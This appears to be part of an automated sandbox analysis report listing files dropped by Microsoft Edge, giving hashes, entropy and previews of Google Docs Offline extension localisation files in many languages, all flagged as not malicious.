                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1244
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.5533961615623735
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvgPCBxNhieFTr9ogjIxurIyJCCBxeh6wAZKn7uCSUhStuysUm+WCBhSueW1Y:1HAgJzoaC6VEn7Css8yoXzzd
                                                                                                                                                                                                                                                                                    MD5:3EC93EA8F8422FDA079F8E5B3F386A73
                                                                                                                                                                                                                                                                                    SHA1:24640131CCFB21D9BC3373C0661DA02D50350C15
                                                                                                                                                                                                                                                                                    SHA-256:ABD0919121956AB535E6A235DE67764F46CFC944071FCF2302148F5FB0E8C65A
                                                                                                                                                                                                                                                                                    SHA-512:F40E879F85BC9B8120A9B7357ED44C22C075BF065F45BEA42BD5316AF929CBD035D5D6C35734E454AEF5B79D378E51A77A71FA23F9EBD0B3754159718FCEB95C
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "..... ....".. },.. "explanationofflinedisabled": {.. "message": "... ... ...... ........ ....... Google ... ..... .......... ..... ... ......... .. ...... ........ ........ Google ..... ........ ... ..... .. ..... ....... .... .... .... ..........".. },.. "explanationofflineenabled": {.. "message": "... ... ...... .... .. .... ....... ..... ....... ....... .. ..... ..... ......".. },.. "extdesc": {.. "message": "..... ......... ...... ........ ....... ......... ........ ....... .. ... ... ..... .........".. },.. "extname": {.. "message": "....... Google ... ......".. },.. "learnmore": {.. "messa
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):977
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.867640976960053
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAWNjbwlmyuAoW32Md+80cVLdUSERHtRo3SjX:J3wlzs42m+8TV+S4H0CjX
                                                                                                                                                                                                                                                                                    MD5:9A798FD298008074E59ECC253E2F2933
                                                                                                                                                                                                                                                                                    SHA1:1E93DA985E880F3D3350FC94F5CCC498EFC8C813
                                                                                                                                                                                                                                                                                    SHA-256:628145F4281FA825D75F1E332998904466ABD050E8B0DC8BB9B6A20488D78A66
                                                                                                                                                                                                                                                                                    SHA-512:9094480379F5AB711B3C32C55FD162290CB0031644EA09A145E2EF315DA12F2E55369D824AF218C3A7C37DD9A276AEEC127D8B3627D3AB45A14B0191ED2BBE70
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "YEN.S.N. YARADIN".. },.. "explanationofflinedisabled": {.. "message": "Oflayns.n.z. Google S.n.di internet ba.lant.s. olmadan istifad. etm.k ist.yirsinizs., Google S.n.din .sas s.hif.sind. ayarlara gedin v. n.vb.ti d.f. internet. qo.ulanda oflayn sinxronizasiyan. aktiv edin.".. },.. "explanationofflineenabled": {.. "message": "Oflayns.n.z, amma m.vcud fayllar. redakt. ed. v. yenil.rini yarada bil.rsiniz.".. },.. "extdesc": {.. "message": "S.n.d, c.dv.l v. t.qdimatlar.n ham.s.n. internet olmadan redakt. edin, yarad.n v. bax.n.".. },.. "extname": {.. "message": "Google S.n.d Oflayn".. },.. "learnmore": {.. "message": ".trafl. M.lumat".. },.. "popuphelptext": {.. "message": "Harda olma..n.zdan v. internet. qo.ulu olub-olmad...n.zdan as.l. olmayaraq, yaz.n, redakt. edin v. .m.kda.l.q edin.".. }..}..
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):3107
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.535189746470889
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:YOWdTQ0QRk+QyJQAy6Qg4QWSe+QECTQLHQlQIfyQ0fnWQjQDrTQik+QvkZTQ+89b:GdTbyRvwgbCTEHQhyVues9oOT3rOCkV
                                                                                                                                                                                                                                                                                    MD5:68884DFDA320B85F9FC5244C2DD00568
                                                                                                                                                                                                                                                                                    SHA1:FD9C01E03320560CBBB91DC3D1917C96D792A549
                                                                                                                                                                                                                                                                                    SHA-256:DDF16859A15F3EB3334D6241975CA3988AC3EAFC3D96452AC3A4AFD3644C8550
                                                                                                                                                                                                                                                                                    SHA-512:7FF0FBD555B1F9A9A4E36B745CBFCAD47B33024664F0D99E8C080BE541420D1955D35D04B5E973C07725573E592CD0DD84FDBB867C63482BAFF6929ADA27CCDE
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"createnew":{"message":"\u0421\u0422\u0412\u0410\u0420\u042b\u0426\u042c \u041d\u041e\u0412\u042b"},"explanationofflinedisabled":{"message":"\u0412\u044b \u045e \u043f\u0430\u0437\u0430\u0441\u0435\u0442\u043a\u0430\u0432\u044b\u043c \u0440\u044d\u0436\u044b\u043c\u0435. \u041a\u0430\u0431 \u043a\u0430\u0440\u044b\u0441\u0442\u0430\u0446\u0446\u0430 \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u043c\u0456 Google \u0431\u0435\u0437 \u043f\u0430\u0434\u043a\u043b\u044e\u0447\u044d\u043d\u043d\u044f \u0434\u0430 \u0456\u043d\u0442\u044d\u0440\u043d\u044d\u0442\u0443, \u043f\u0435\u0440\u0430\u0439\u0434\u0437\u0456\u0446\u0435 \u0434\u0430 \u043d\u0430\u043b\u0430\u0434 \u043d\u0430 \u0433\u0430\u043b\u043e\u045e\u043d\u0430\u0439 \u0441\u0442\u0430\u0440\u043e\u043d\u0446\u044b \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u045e Google \u0456 \u045e\u043a\u043b\u044e\u0447\u044b\u0446\u0435 \u0441\u0456\u043d\u0445\u0440\u0430\u043d\u0456\u0437\u0430\u0446\u044b\u044e
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1389
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.561317517930672
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAp1DQqUfZ+Yann08VOeadclUZbyMzZzsYvwUNn7nOyRK8/nn08V7:g1UTfZ+Ya08Uey3tflCRE08h
                                                                                                                                                                                                                                                                                    MD5:2E6423F38E148AC5A5A041B1D5989CC0
                                                                                                                                                                                                                                                                                    SHA1:88966FFE39510C06CD9F710DFAC8545672FFDCEB
                                                                                                                                                                                                                                                                                    SHA-256:AC4A8B5B7C0B0DD1C07910F30DCFBDF1BCB701CFCFD182B6153FD3911D566C0E
                                                                                                                                                                                                                                                                                    SHA-512:891FCDC6F07337970518322C69C6026896DD3588F41F1E6C8A1D91204412CAE01808F87F9F2DEA1754458D70F51C3CEF5F12A9E3FC011165A42B0844C75EC683
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. .. .......... Google ......... ... ........ ......, ........ ........... . ......... ........ .. Google ......... . ........ ...... .............. ......... ..., ...... ..... ...... . .........".. },.. "explanationofflineenabled": {.. "message": "...... ..., .. ... ...... .. ........... ......... ....... ... .. ......... .....".. },.. "extdesc": {.. "message": "............, .......... . ............ ...... ........., .......... ....... . ........... . ...... .... ... ...... .. .........".. },..
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1763
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.25392954144533
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):930
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.569672473374877
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "CREA'N UN DE NOU".. },.. "explanationofflinedisabled": {.. "message": "No tens connexi.. Per utilitzar Documents de Google sense connexi. a Internet, ves a la configuraci. de la p.gina d'inici d'aquest servei i activa l'opci. per sincronitzar-se sense connexi. la propera vegada que estiguis connectat a la xarxa.".. },.. "explanationofflineenabled": {.. "message": "Tot i que no tens connexi., pots editar o crear fitxers.".. },.. "extdesc": {.. "message": "Edita, crea i consulta documents, fulls de c.lcul i presentacions, tot sense acc.s a Internet.".. },.. "extname": {.. "message": "Documents de Google sense connexi.".. },.. "learnmore": {.. "message": "M.s informaci.".. },.. "popuphelptext": {.. "message": "Escriu text, edita fitxers i col.labora-hi siguis on siguis, amb o sense connexi. a Internet.".. }..}..
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):913
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.947221919047
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "VYTVO.IT".. },.. "explanationofflinedisabled": {.. "message": "Jste offline. Pokud chcete Dokumenty Google pou..vat bez p.ipojen. k.internetu, a. budete p...t. online, p.ejd.te do nastaven. na domovsk. str.nce Dokument. Google a.zapn.te offline synchronizaci.".. },.. "explanationofflineenabled": {.. "message": "Jste offline, ale st.le m..ete upravovat dostupn. soubory nebo vytv..et nov..".. },.. "extdesc": {.. "message": "Upravujte, vytv..ejte a.zobrazujte sv. dokumenty, tabulky a.prezentace . v.e bez p..stupu k.internetu.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Dal.. informace".. },.. "popuphelptext": {.. "message": "Pi.te, upravujte a.spolupracujte kdekoli, s.p.ipojen.m k.internetu i.bez n.j.".. }..}..
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):806
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.815663786215102
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"createnew":{"message":"CREU NEWYDD"},"explanationofflinedisabled":{"message":"Rydych chi all-lein. I ddefnyddio Dogfennau Google heb gysylltiad \u00e2'r rhyngrwyd, ewch i'r gosodiadau ar dudalen hafan Dogfennau Google a throi 'offine sync' ymlaen y tro nesaf y byddwch wedi'ch cysylltu \u00e2'r rhyngrwyd."},"explanationofflineenabled":{"message":"Rydych chi all-lein, ond gallwch barhau i olygu'r ffeiliau sydd ar gael neu greu rhai newydd."},"extdesc":{"message":"Gallwch olygu, creu a gweld eich dogfennau, taenlenni a chyflwyniadau \u2013 i gyd heb fynediad i'r rhyngrwyd."},"extname":{"message":"Dogfennau Google All-lein"},"learnmore":{"message":"DYSGU MWY"},"popuphelptext":{"message":"Ysgrifennwch, golygwch a chydweithiwch lle bynnag yr ydych, gyda chysylltiad \u00e2'r rhyngrwyd neu hebddo."}}.
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):883
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.5096240460083905
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "OPRET NYT".. },.. "explanationofflinedisabled": {.. "message": "Du er offline. Hvis du vil bruge Google Docs uden en internetforbindelse, kan du g. til indstillinger p. startsiden for Google Docs og aktivere offlinesynkronisering, n.ste gang du har internetforbindelse.".. },.. "explanationofflineenabled": {.. "message": "Du er offline, men du kan stadig redigere tilg.ngelige filer eller oprette nye.".. },.. "extdesc": {.. "message": "Rediger, opret og se dine dokumenter, regneark og pr.sentationer helt uden internetadgang.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "F. flere oplysninger".. },.. "popuphelptext": {.. "message": "Skriv, rediger og samarbejd, uanset hvor du er, og uanset om du har internetforbindelse.".. }..}..
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1031
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.621865814402898
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "NEU ERSTELLEN".. },.. "explanationofflinedisabled": {.. "message": "Sie sind offline. Um Google Docs ohne Internetverbindung zu verwenden, gehen Sie auf der Google Docs-Startseite auf \"Einstellungen\" und schalten die Offlinesynchronisierung ein, wenn Sie das n.chste Mal mit dem Internet verbunden sind.".. },.. "explanationofflineenabled": {.. "message": "Sie sind offline, aber k.nnen weiterhin verf.gbare Dateien bearbeiten oder neue Dateien erstellen.".. },.. "extdesc": {.. "message": "Mit der Erweiterung k.nnen Sie Dokumente, Tabellen und Pr.sentationen bearbeiten, erstellen und aufrufen.. ganz ohne Internetverbindung.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Weitere Informationen".. },.. "popuphelptext": {.. "message": "Mit oder ohne Internetverbindung: Sie k.nnen von .berall Dokumente erstellen, .ndern und zusammen mit anderen
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1613
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.618182455684241
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):851
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                                    MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                                    SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                                    SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                                    SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):848
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.494568170878587
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvgg4eCBxNdN3vRyc1NzXW6iFrSCBxesJGceKCSUuvlvOgwCBhUufz1tnaXrQ:1HA3djfR3NzXviFrJj4sJXJ+bA6RM
                                                                                                                                                                                                                                                                                    MD5:3734D498FB377CF5E4E2508B8131C0FA
                                                                                                                                                                                                                                                                                    SHA1:AA23E39BFE526B5E3379DE04E00EACBA89C55ADE
                                                                                                                                                                                                                                                                                    SHA-256:AB5CDA04013DCE0195E80AF714FBF3A67675283768FFD062CF3CF16EDB49F5D4
                                                                                                                                                                                                                                                                                    SHA-512:56D9C792954214B0DE56558983F7EB7805AC330AF00E944E734340BE41C68E5DD03EDDB17A63BC2AB99BDD9BE1F2E2DA5BE8BA7C43D938A67151082A9041C7BA
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an Internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the Internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create and view your documents, spreadsheets and presentations . all without Internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn more".. },.. "popuphelptext": {.. "message": "Write, edit and collaborate wherever you are, with or without an Internet connection.".. }..}..
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1425
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.461560329690825
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HA6Krbbds5Kna/BNzXviFrpsCxKU4irpNQ0+qWK5yOJAaCB7MAa6:BKrbBs5Kna/BNzXvi3sCxKZirA0jWK5m
                                                                                                                                                                                                                                                                                    MD5:578215FBB8C12CB7E6CD73FBD16EC994
                                                                                                                                                                                                                                                                                    SHA1:9471D71FA6D82CE1863B74E24237AD4FD9477187
                                                                                                                                                                                                                                                                                    SHA-256:102B586B197EA7D6EDFEB874B97F95B05D229EA6A92780EA8544C4FF1E6BC5B1
                                                                                                                                                                                                                                                                                    SHA-512:E698B1A6A6ED6963182F7D25AC12C6DE06C45D14499DDC91E81BDB35474E7EC9071CFEBD869B7D129CB2CD127BC1442C75E408E21EB8E5E6906A607A3982B212
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createNew": {.. "description": "Text shown in the extension pop up for creating a new document",.. "message": "CREATE NEW".. },.. "explanationOfflineDisabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is disabled.",.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationOfflineEnabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is enabled.",.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extDesc": {.. "description": "Extension description",.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extName": {.. "description": "Extension name",..
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):961
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.537633413451255
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvggeCBxNFxcw2CVcfamedatqWCCBxeFxCF/m+rWAaFQbCSUuExqIQdO06stp:1HAqn0gcfa9dc/5mCpmIWck02USfWmk
                                                                                                                                                                                                                                                                                    MD5:F61916A206AC0E971CDCB63B29E580E3
                                                                                                                                                                                                                                                                                    SHA1:994B8C985DC1E161655D6E553146FB84D0030619
                                                                                                                                                                                                                                                                                    SHA-256:2008F4FAAB71AB8C76A5D8811AD40102C380B6B929CE0BCE9C378A7CADFC05EB
                                                                                                                                                                                                                                                                                    SHA-512:D9C63B2F99015355ACA04D74A27FD6B81170750C4B4BE7293390DC81EF4CD920EE9184B05C61DC8979B6C2783528949A4AE7180DBF460A2620DBB0D3FD7A05CF
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "CREAR".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a Configuraci.n en la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que te conectes a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n. Aun as., puedes crear archivos o editar los que est.n disponibles.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones; todo ello, sin acceso a Internet.".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe o edita contenido y colabora con otras personas desde cualquier lugar, con o sin conexi.n a Internet.".. }..}..
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):959
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.570019855018913
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HARn05cfa9dcDmQOTtSprj0zaGUSjSGZ:+n0CfMcDmQOTQprj4qpC
                                                                                                                                                                                                                                                                                    MD5:535331F8FB98894877811B14994FEA9D
                                                                                                                                                                                                                                                                                    SHA1:42475E6AFB6A8AE41E2FC2B9949189EF9BBE09FB
                                                                                                                                                                                                                                                                                    SHA-256:90A560FF82605DB7EDA26C90331650FF9E42C0B596CEDB79B23598DEC1B4988F
                                                                                                                                                                                                                                                                                    SHA-512:2CE9C69E901AB5F766E6CFC1E592E1AF5A07AA78D154CCBB7898519A12E6B42A21C5052A86783ABE3E7A05043D4BD41B28960FEDDB30169FF7F7FE7208C8CFE9
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "CREAR NUEVO".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a la configuraci.n de la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que est.s conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n, pero a.n puedes modificar los archivos disponibles o crear otros nuevos.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones aunque no tengas acceso a Internet".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, modifica y colabora dondequiera que est.s, con conexi.n a Internet o sin ella.".. }..}..
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):968
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.633956349931516
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HA5WG6t306+9sihHvMfdJLjUk4NJPNczGr:mWGY0cOUdJODPmzs
                                                                                                                                                                                                                                                                                    MD5:64204786E7A7C1ED9C241F1C59B81007
                                                                                                                                                                                                                                                                                    SHA1:586528E87CD670249A44FB9C54B1796E40CDB794
                                                                                                                                                                                                                                                                                    SHA-256:CC31B877238DA6C1D51D9A6155FDE565727A1956572F466C387B7E41C4923A29
                                                                                                                                                                                                                                                                                    SHA-512:44FCF93F3FB10A3DB68D74F9453995995AB2D16863EC89779DB451A4D90F19743B8F51095EEC3ECEF5BD0C5C60D1BF3DFB0D64DF288DCCFBE70C129AE350B2C6
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "LOO UUS".. },.. "explanationofflinedisabled": {.. "message": "Teil ei ole v.rgu.hendust. Teenuse Google.i dokumendid kasutamiseks ilma Interneti-.henduseta avage j.rgmine kord, kui olete Internetiga .hendatud, teenuse Google.i dokumendid avalehel seaded ja l.litage sisse v.rgu.henduseta s.nkroonimine.".. },.. "explanationofflineenabled": {.. "message": "Teil ei ole v.rgu.hendust, kuid saate endiselt saadaolevaid faile muuta v.i uusi luua.".. },.. "extdesc": {.. "message": "Saate luua, muuta ja vaadata oma dokumente, arvustustabeleid ning esitlusi ilma Interneti-.henduseta.".. },.. "extname": {.. "message": "V.rgu.henduseta Google.i dokumendid".. },.. "learnmore": {.. "message": "Lisateave".. },.. "popuphelptext": {.. "message": "Kirjutage, muutke ja tehke koost..d .ksk.ik kus olenemata sellest, kas teil on Interneti-.hendus.".. }..}..
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):838
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.4975520913636595
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:YnmjggqTWngosqYQqE1kjO39m7OddC0vjWQMmWgqwgQ8KLcxOb:Ynmsgqyngosq9qxTOs0vjWQMbgqchb
                                                                                                                                                                                                                                                                                    MD5:29A1DA4ACB4C9D04F080BB101E204E93
                                                                                                                                                                                                                                                                                    SHA1:2D0E4587DDD4BAC1C90E79A88AF3BD2C140B53B1
                                                                                                                                                                                                                                                                                    SHA-256:A41670D52423BA69C7A65E7E153E7B9994E8DD0370C584BDA0714BD61C49C578
                                                                                                                                                                                                                                                                                    SHA-512:B7B7A5A0AA8F6724B0FA15D65F25286D9C66873F03080CBABA037BDEEA6AADC678AC4F083BC52C2DB01BEB1B41A755ED67BBDDB9C0FE4E35A004537A3F7FC458
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"createnew":{"message":"SORTU"},"explanationofflinedisabled":{"message":"Ez zaude konektatuta Internetera. Google Dokumentuak konexiorik gabe erabiltzeko, joan Google Dokumentuak zerbitzuaren orri nagusiko ezarpenetara eta aktibatu konexiorik gabeko sinkronizazioa Internetera konektatzen zaren hurrengoan."},"explanationofflineenabled":{"message":"Ez zaude konektatuta Internetera, baina erabilgarri dauden fitxategiak edita ditzakezu, baita beste batzuk sortu ere."},"extdesc":{"message":"Editatu, sortu eta ikusi dokumentuak, kalkulu-orriak eta aurkezpenak Interneteko konexiorik gabe."},"extname":{"message":"Google Dokumentuak konexiorik gabe"},"learnmore":{"message":"Lortu informazio gehiago"},"popuphelptext":{"message":"Edonon zaudela ere, ez duzu zertan konektatuta egon idatzi, editatu eta lankidetzan jardun ahal izateko."}}.
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1305
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.673517697192589
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAX9yM7oiI99Rwx4xyQakJbfAEJhmq/RlBu92P7FbNcgYVJ0:JM7ovex4xyQaKjAEyq/p7taX0
                                                                                                                                                                                                                                                                                    MD5:097F3BA8DE41A0AAF436C783DCFE7EF3
